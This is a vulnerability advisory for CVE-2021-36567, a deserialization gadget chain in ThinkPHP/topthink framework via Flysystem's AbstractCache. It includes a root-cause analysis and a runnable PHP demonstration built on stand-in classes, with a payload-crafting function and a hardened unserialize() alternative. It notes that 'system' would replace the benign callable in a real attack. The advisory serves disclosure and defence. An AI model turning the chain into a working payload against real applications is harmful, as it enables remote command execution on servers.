CVE-2021-36567: Deserialization of Untrusted Data in topthink/framework

CVSS Score (v3.1)
9.8

Basic Information

EPSS Score
0.86807%
Published
12/7/2021
Updated
2/1/2023
KEV Status
No
Technology
PHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package Name       | Ecosystem | Vulnerable Versions | First Patched Version
topthink/framework | composer  | <= 6.0.8            | (none listed)

Vulnerability Intelligence
Root Cause Analysis (Miggo AI)

The vulnerability is a deserialization gadget (POP) chain rather than an unserialize() call inside the framework itself: it becomes exploitable when application code passes attacker-controlled data to unserialize() and the payload instantiates the framework's CacheStore object (think\filesystem\CacheStore). CacheStore extends League\Flysystem\Cached\Storage\AbstractCache, whose __destruct() method calls save() when the autosave flag is false. save() hands the cache contents to the configured store, which in this chain is a File cache driver whose 'serialize' option is attacker-supplied and names an arbitrary PHP callable (e.g. system()); the driver invokes that callable on the data it was asked to store, giving arbitrary command execution. The entry point of the chain is therefore the __destruct() method that CacheStore inherits from AbstractCache, and the sink is the driver's lookup of the 'serialize' option. Note for triage: the framework does not unserialize request data on its own, so the PR:N/UI:N vector above assumes the application exposes an unserialize() sink on attacker-controlled input; without such a sink the gadget chain is not reachable.
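The chain described above, shown as an added example that is not code from the page, from topthink/framework or from League\Flysystem. The classes are simplified stand-ins (AbstractCacheLike, CacheStoreLike, FileDriverLike) that reproduce only the call shape __destruct() -> save() -> set() -> serialize(); the function names craftPayload, vulnerableSink and hardenedSink are this example's own. A benign callable (strtoupper) stands in for system() so the script is safe to run; in a real payload the same property would name a command-execution function, and the JSON the driver builds would be the string handed to it.

```php
<?php
declare(strict_types=1);

// Simplified stand-ins for the gadget classes. They are NOT the real
// League\Flysystem or topthink/framework classes; they only reproduce the
// call shape __destruct() -> save() -> set() -> serialize(). Properties are
// public here for brevity (the originals are protected; visibility does not
// affect the chain, since unserialize() restores any property).

abstract class AbstractCacheLike              // stand-in for Cached\Storage\AbstractCache
{
    public bool $autosave = true;
    public array $cache = [];
    public bool $complete = false;

    // Gadget entry point: PHP runs this when the unserialized object is destroyed.
    public function __destruct()
    {
        if (!$this->autosave) {
            $this->save();
        }
    }

    public function getForStorage(): string
    {
        return json_encode([$this->cache, $this->complete]);
    }

    abstract public function save(): void;
}

class CacheStoreLike extends AbstractCacheLike   // stand-in for CacheStore
{
    public $store;                    // attacker picks any object with a set() method
    public string $key = 'flysystem';
    public ?int $expire = null;

    public function save(): void
    {
        $this->store->set($this->key, $this->getForStorage(), $this->expire);
    }
}

class FileDriverLike                  // stand-in for the File cache driver
{
    public array $options = [];
    public static array $calls = [];  // instrumentation only: what the sink produced

    public function set(string $name, $value, ?int $expire = null): bool
    {
        self::$calls[] = $this->serialize($value);
        return true;                  // the real driver writes the result to a cache file
    }

    protected function serialize($data): string
    {
        // The sink: the callable's name comes from a property the attacker serialized.
        $serialize = $this->options['serialize'][0] ?? 'serialize';
        return $serialize($data);
    }
}

// Attacker side: build the object graph and serialize it. $callable is the
// function the driver will invoke; $arg ends up inside the JSON it receives.
function craftPayload(string $callable, string $arg): string
{
    $driver = new FileDriverLike();
    $driver->options = ['serialize' => [$callable]];
    $store = new CacheStoreLike();
    $store->autosave = false;         // forces __destruct() to call save()
    $store->store = $driver;
    $store->cache = [$arg];
    return serialize($store);
}

// Application side, vulnerable: unserialize() on untrusted input rebuilds the
// gadget objects; the destructor fires as soon as the object is released.
function vulnerableSink(string $untrusted): void
{
    $obj = unserialize($untrusted);
    unset($obj);
}

// Application side, hardened: with allowed_classes => false every object in the
// payload becomes __PHP_Incomplete_Class, which has no destructor, so no gadget
// method can run. (Switching the format to JSON is the better long-term fix.)
function hardenedSink(string $untrusted)
{
    return unserialize($untrusted, ['allowed_classes' => false]);
}

$payload = craftPayload('strtoupper', 'id');   // 'system' in a real attack
vulnerableSink($payload);
echo "vulnerable: callable ran, produced ", FileDriverLike::$calls[0], "\n";

FileDriverLike::$calls = [];
$r = hardenedSink($payload);
echo "hardened: got ", get_class($r), ", sink calls: ", count(FileDriverLike::$calls), "\n";
```

Run it with `php example.php` (PHP 7.4 or later for typed properties). The first line shows that strtoupper was invoked on the JSON the driver was handed, purely as a side effect of unserialize() and without any code path in the application calling the driver; the second shows that the hardened sink returns a __PHP_Incomplete_Class and the driver's serialize() never ran. The same payload would work against the real classes with a dangerous callable, which is why the only reliable fix is to stop unserializing attacker-controlled data, with allowed_classes => false as a defence in depth.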

WAF Protection Rules

WAF Rule

ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\AbstractCache.
